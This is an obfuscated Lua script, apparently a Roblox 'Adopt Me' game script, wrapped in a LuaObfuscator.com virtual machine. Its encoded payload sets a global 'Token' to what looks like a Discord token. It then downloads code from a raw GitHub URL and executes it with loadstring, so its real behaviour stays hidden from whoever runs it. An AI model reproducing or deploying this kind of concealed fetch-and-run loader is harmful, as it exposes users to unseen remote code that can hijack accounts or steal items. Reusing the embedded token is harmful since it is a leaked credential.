--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=v2(v0(v30,16));if v19 then local v86=v5(v79,v19);v19=nil;return v86;else return v79;end end end);local function v20(v31,v32,v33) if v33 then local v80=(v31/((5 -3)^(v32-(1 + 0))))%((1 + 1)^(((v33-(2 -1)) -(v32-((1 + 0) -(0 + 0)))) + 1 + 0)) ;return v80-(v80%((119 -(32 + 85)) -1)) ;else local v81=(621 -(555 + (1021 -(892 + 65))))^(v32-(932 -(857 + 74))) ;return (((v31%(v81 + v81))>=v81) and (569 -(367 + (479 -278)))) or (0 -0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + 113)) ;return (v40 * (12302277 + 4474939)) + (v39 * (160901 -95365)) + (v38 * ((751 -562) + 67)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=953 -(802 + 150) ;local v44=(v20(v42,2 -1 ,36 -16 ) * (2^(24 + 8))) + v41 ;local v45=v20(v42,(1460 -(416 + 26)) -(915 + 82) ,87 -56 );local v46=((v20(v42,32)==1) and  -(1 + (0 -0))) or ((1 + 0) -0) ;if (v45==0) then if (v44==(1187 -(1069 + 118))) then return v46 * (0 -0) ;else v45=(1 -0) -(438 -(145 + 293)) ;v43=(0 -0) + 0 ;end elseif (v45==(3636 -1589)) then return ((v44==0) and (v46 * ((1 + (430 -(44 + 386)))/((2277 -(998 + 488)) -(368 + 135 + 288))))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v47) local v48=0;local v49;local v50;while true do if (v48==1) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=774 -(201 + 571) ;end if (v48==((62 + 1079) -(41 + 75 + 1022))) then return v6(v50);end if (v48==(0 -0)) then v49=nil;if  not v47 then v47=v23();if (v47==((885 -(261 + 624)) + 0)) then return "";end end v48=3 -2 ;end if (v48==(7 -5)) then v50={};for v87=860 -(814 + 45) , #v49 do v50[v87]=v2(v1(v3(v49,v87,v87)));end v48=7 -4 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 -0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51~=0) then else v52=(function() return function(v96,v97,v98) local v99=(function() return 0;end)();local v100=(function() return;end)();while true do if ((675 -(534 + 141))==v99) then v100=(function() return 0 + 0 ;end)();while true do if (0~=v100) then else local v131=(function() return 0 + 0 ;end)();while true do if (0==v131) then v96[v97-#"}" ]=(function() return v98();end)();return v96,v97,v98;end end end end break;end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v51=(function() return 1;end)();end if (v51~=(1 + 0)) then else v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v51=(function() return 2 -0 ;end)();end if (v51~=2) then else local v85=(function() return 0 -0 ;end)();while true do if (v85~=0) then else v58=(function() return {};end)();for v107= #"!",v57 do local v108=(function() return 0 + 0 ;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v108~=0) then else v109=(function() return v21();end)();v110=(function() return nil;end)();v108=(function() return 1 + 0 ;end)();end if (v108~=(397 -(115 + 281))) then else if (v109== #">") then v110=(function() return v21()~=0 ;end)();elseif (v109==(4 -2)) then v110=(function() return v24();end)();elseif (v109~= #"-19") then else v110=(function() return v25();end)();end v58[v107]=(function() return v110;end)();break;end end end v85=(function() return 1;end)();end if (v85~=(1 + 0)) then else v56[ #"asd"]=(function() return v21();end)();v51=(function() return 7 -4 ;end)();break;end end end if (3==v51) then for v89= #"[",v23() do local v90=(function() return v21();end)();if (v20(v90, #",", #"[")==0) then local v102=(function() return 0;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v102==0) then local v111=(function() return 0;end)();while true do if (v111~=(3 -2)) then else v102=(function() return 868 -(550 + 317) ;end)();break;end if (v111==0) then v103=(function() return 0 -0 ;end)();v104=(function() return nil;end)();v111=(function() return 1 -0 ;end)();end end end if (v102==(2 -1)) then local v112=(function() return 0;end)();while true do if (0==v112) then v105=(function() return nil;end)();v106=(function() return nil;end)();v112=(function() return 1;end)();end if (v112==(286 -(134 + 151))) then v102=(function() return 2;end)();break;end end end if (v102==(1667 -(970 + 695))) then while true do if (v103==(3 -1)) then local v134=(function() return 0;end)();local v135=(function() return;end)();while true do if (v134~=0) then else v135=(function() return 1990 -(582 + 1408) ;end)();while true do if (v135==(0 -0)) then if (v20(v105, #"{", #"<")== #">") then v106[2 -0 ]=(function() return v58[v106[7 -5 ]];end)();end if (v20(v105,1826 -(1195 + 629) ,2)~= #"}") then else v106[ #"19("]=(function() return v58[v106[ #"19("]];end)();end v135=(function() return 1;end)();end if (v135~=1) then else v103=(function() return  #"-19";end)();break;end end break;end end end if (v103~=0) then else local v136=(function() return 0;end)();local v137=(function() return;end)();while true do if ((0 -0)==v136) then v137=(function() return 241 -(187 + 54) ;end)();while true do if (v137==1) then v103=(function() return  #"{";end)();break;end if (v137~=0) then else v104=(function() return v20(v90,782 -(162 + 618) , #"xxx");end)();v105=(function() return v20(v90, #"xnxx",5 + 1 );end)();v137=(function() return 1 + 0 ;end)();end end break;end end end if (v103== #"]") then local v138=(function() return 0 -0 ;end)();local v139=(function() return;end)();while true do if (v138==0) then v139=(function() return 0 -0 ;end)();while true do if (v139==(0 + 0)) then v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==(1636 -(1373 + 263))) then local v188=(function() return 0;end)();local v189=(function() return;end)();while true do if (v188==0) then v189=(function() return 1000 -(451 + 549) ;end)();while true do if (v189~=(0 + 0)) then else v106[ #"19("]=(function() return v22();end)();v106[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v104== #"!") then v106[ #"-19"]=(function() return v23();end)();elseif (v104==(2 -0)) then v106[ #"-19"]=(function() return v23() -((2 -0)^(1400 -(746 + 638))) ;end)();elseif (v104== #"gha") then local v194=(function() return 0;end)();while true do if (v194==0) then v106[ #"xxx"]=(function() return v23() -(2^(7 + 9)) ;end)();v106[ #"0313"]=(function() return v22();end)();break;end end end v139=(function() return 1 -0 ;end)();end if (v139~=1) then else v103=(function() return 343 -(218 + 123) ;end)();break;end end break;end end end if (v103~= #"xxx") then else if (v20(v105, #"91(", #"-19")== #"]") then v106[ #"xnxx"]=(function() return v58[v106[ #"?id="]];end)();end v53[v89]=(function() return v106;end)();break;end end break;end end end end for v91= #"]",v23() do v54,v91,v28=(function() return v52(v54,v91,v28);end)();end return v56;end end end local function v29(v59,v60,v61) local v62=v59[1582 -((3086 -(1126 + 425)) + 46) ];local v63=v59[2];local v64=v59[3 + 0 ];return function(...) local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1 + 0 ;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v82=0 + 0 ,v73 do if (v82>=v67) then v71[v82-v67 ]=v72[v82 + (1 -0) ];else v75[v82]=v72[v82 + (1468 -(899 + 568)) ];end end local v76=(v73-v67) + 1 + 0 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1];if (v78<=(24 -14)) then if (v78<=(607 -(268 + 335))) then if (v78<=(291 -(60 + 230))) then if ((1812<=3249) and (v78>(572 -(426 + (551 -(118 + 287)))))) then local v114=0 + 0 ;local v115;local v116;local v117;local v118;while true do if ((518<902) and (1623<=1957) and (v114==2)) then for v168=v115,v70 do v118=v118 + ((5710 -4253) -(282 + 1174)) ;v75[v168]=v116[v118];end break;end if (v114==(812 -(569 + 242))) then v70=(v117 + v115) -1 ;v118=0 -0 ;v114=2;end if (v114==(0 + 0)) then v115=v77[2];v116,v117=v68(v75[v115](v13(v75,v115 + (1025 -(706 + (1439 -(118 + 1003)))) ,v77[3])));v114=1252 -(721 + (1551 -1021)) ;end end else v69=v77[1274 -((1322 -(142 + 235)) + 326) ];end elseif ((2994>858) and (v78<=(4 -(9 -7)))) then v75[v77[2 + 0 ]]=v61[v77[703 -(271 + 429) ]];elseif ((4412==4412) and (v78>(3 + 0))) then local v141=1500 -(1408 + 92) ;local v142;local v143;local v144;local v145;while true do if (v141==0) then v142=v77[2];v143,v144=v68(v75[v142](v13(v75,v142 + (1087 -(101 + 360 + 625)) ,v77[1291 -(993 + 295) ])));v141=(978 -(553 + 424)) + 0 ;end if ((v141==(1173 -((790 -372) + 664 + 89))) or (3755<=915)) then for v183=v142,v70 do v145=v145 + 1 + 0 ;v75[v183]=v143[v145];end break;end if (v141==(1 + 0)) then v70=(v144 + v142) -(1 + 0 + 0) ;v145=0 + 0 ;v141=2;end end else do return;end end elseif (v78<=(536 -(406 + 123))) then if (v78<=(1774 -(1749 + 20))) then do return;end elseif ((1750>=842) and (v78>(2 + 4))) then v69=v77[1325 -(1249 + 43 + 30) ];elseif (v75[v77[1 + 1 ]]==v77[1149 -(199 + 267 + 679) ]) then v69=v69 + 1 ;else v69=v77[6 -3 ];end elseif (v78<=(22 -14)) then v75[v77[2]]();elseif (v78>(1909 -(106 + 1794))) then v75[v77[1 + 1 ]]=v77[1 + 2 + 0 ];else local v149=0 -(0 -0) ;local v150;while true do if ((3946>3743) and (v149==(0 -0))) then v150=v77[116 -(4 + 110) ];v75[v150]=v75[v150](v13(v75,v150 + (585 -(57 + 527)) ,v70));break;end end end elseif (v78<=(1442 -(41 + 1386))) then if (v78<=(115 -((47 -30) + 86))) then if ((v78==(8 + 3)) or (1335>=3306)) then local v122=0 -0 ;local v123;local v124;while true do if (v122==(2 -1)) then v75[v123 + (167 -(122 + 44)) ]=v124;v75[v123]=v124[v77[6 -2 ]];break;end if ((4372>1850) and (v122==(0 -0))) then v123=v77[2 + 0 ];v124=v75[v77[3]];v122=1 + (0 -0) ;end end else v61[v77[5 -2 ]]=v75[v77[2]];end elseif ((4844>2253) and (232<821) and (v78<=(78 -(30 + 35)))) then for v132=v77[2],v77[1 + 2 + 0 ] do v75[v132]=nil;end elseif (v78>(1271 -(1043 + 214))) then if (v75[v77[2]]==v77[15 -11 ]) then v69=v69 + (1213 -(323 + 889)) ;else v69=v77[7 -4 ];end else v75[v77[582 -(361 + 219) ]]=v61[v77[323 -(53 + (1290 -1023)) ]];end elseif (v78<=(771 -(239 + 514))) then if (v78<=16) then v61[v77[1 + 2 ]]=v75[v77[415 -(15 + 398) ]];elseif (v78>(999 -(18 + 964))) then local v153=0 -0 ;local v154;while true do if ((452==452) and (v153==(0 + 0))) then v154=v77[2 + 0 ];v75[v154]=v75[v154](v13(v75,v154 + (851 -(20 + 830)) ,v70));break;end end else v75[v77[1 + 1 + 0 ]]();end elseif (v78<=(145 -(116 + 10))) then v75[v77[1 + 1 ]]=v77[741 -(542 + 196) ];elseif (v78>20) then for v164=v77[3 -(1330 -(797 + 532)) ],v77[1 + 2 + 0 ] do v75[v164]=nil;end else local v155=0 + 0 ;local v156;local v157;while true do if ((v155==(0 + 0)) or (4557<2087)) then v156=v77[1 + 1 ];v157=v75[v77[7 -4 ]];v155=1;end if ((3874==3874) and (v155==1)) then v75[v156 + (2 -1) ]=v157;v75[v156]=v157[v77[4]];break;end end end v69=v69 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073O00028O0003053O00546F6B656E03463O004E5445304E7A55774E6A55344E4459324D4449784D7A63332E47513733356A2E354768557A6E6D39576B514632565433595277325A52575649486E363274615F4F494F717367030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403613O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F426573742D536372697074732D7262782F61646F70742D6D652D7363726970742D736F757263652D636F64652F6D61696E2F736F75726365253230636F646500153O00120A3O00014O000D000100013O00260F3O00020001000100044O0002000100120A000100013O00260F000100050001000100044O0005000100120A000200033O00120C000200023O00120E000200043O00120E000300053O00200B00030003000600120A000500074O0004000300054O000900023O00022O000800020001000100044O0014000100044O0005000100044O0014000100044O000200012O00053O00017O00",v9(),...);
